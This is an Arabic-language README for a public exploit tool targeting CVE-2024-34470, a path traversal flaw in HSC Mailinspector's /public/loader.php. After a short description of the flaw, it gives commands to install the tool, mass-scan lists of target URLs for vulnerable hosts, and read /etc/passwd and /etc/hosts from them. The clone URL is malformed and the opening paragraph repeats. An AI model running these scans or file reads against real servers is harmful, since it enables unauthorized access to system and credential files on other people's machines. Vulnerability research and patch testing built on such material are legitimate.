
تم العثور على ثغرة أمنية خطيرة في HSC Mailinspector حتى الإصدار 5.2.18. تؤثر هذه الثغرة على وظيفة غير معروفة في الملف /public/loader.php.
تم العثور على ثغرة أمنية خطيرة في HSC Mailinspector حتى الإصدار 5.2.18. تؤثر هذه الثغرة على وظيفة غير معروفة في الملف /public/loader.php. يؤدي التلاعب بالوسيطة 'path' بإدخال غير معروف إلى ثغرة اجتياز المسار. وفقًا لـ CWE، تم تصنيف هذه المشكلة على أنها CWE-22. يستخدم المنتج مدخلات خارجية لبناء اسم مسار يهدف إلى تحديد ملف أو دليل يقع تحت دليل رئيسي مقيد، لكن المنتج لا يعمل على تحييد العناصر الخاصة بشكل صحيح داخل اسم المسار والتي قد تؤدي إلى حل اسم المسار إلى موقع خارج الدليل المقيد. يؤثر هذا على السرية والنزاهة والتوفر.
استنساخ المستودع:
git clone https://CVE-2024-34470.git
cd CVE-2024-34470
تثبيت التبعيات
تأكد من تثبيت Python و pip. ثم قم بتشغيل:
pip install -r requirements.txt
للبحث عن أهداف متعددة باستخدام ملف نصي، استخدم البرنامج النصي Massive_CVE-2024-34470.py
$ python3 Massive_CVE-2024-34470.py urls.txt urls_vulnerable.txt 2>/dev/null
يجب أن يكون التنسيق الذي يكون به ملف urls.txt كما يلي:
https://10.18.97.2
http://domain.com
https://192.8.7.2:4443
![[Screenshot_1.png]](https://github.com/Mr-r00t11/CVE-2024-34470/blob/main/img/Screenshot_1.png)
بمجرد تحديد الأهداف المعرضة للخطر، نستخدم البرنامج النصي المسمى CVE-2024-34470.py لاستغلال وعرض المحتوى المحدد عبر الطرفية.
# Read file content passwd
$ python CVE-2024-34470.py http://example.com /etc/passwd 2>/dev/null
# Read file content hosts
$ python CVE-2024-34470.py http://example.com /etc/hosts
![[screenshot_2.png]](https://github.com/Mr-r00t11/CVE-2024-34470/blob/main/img/Screenshot_2.png)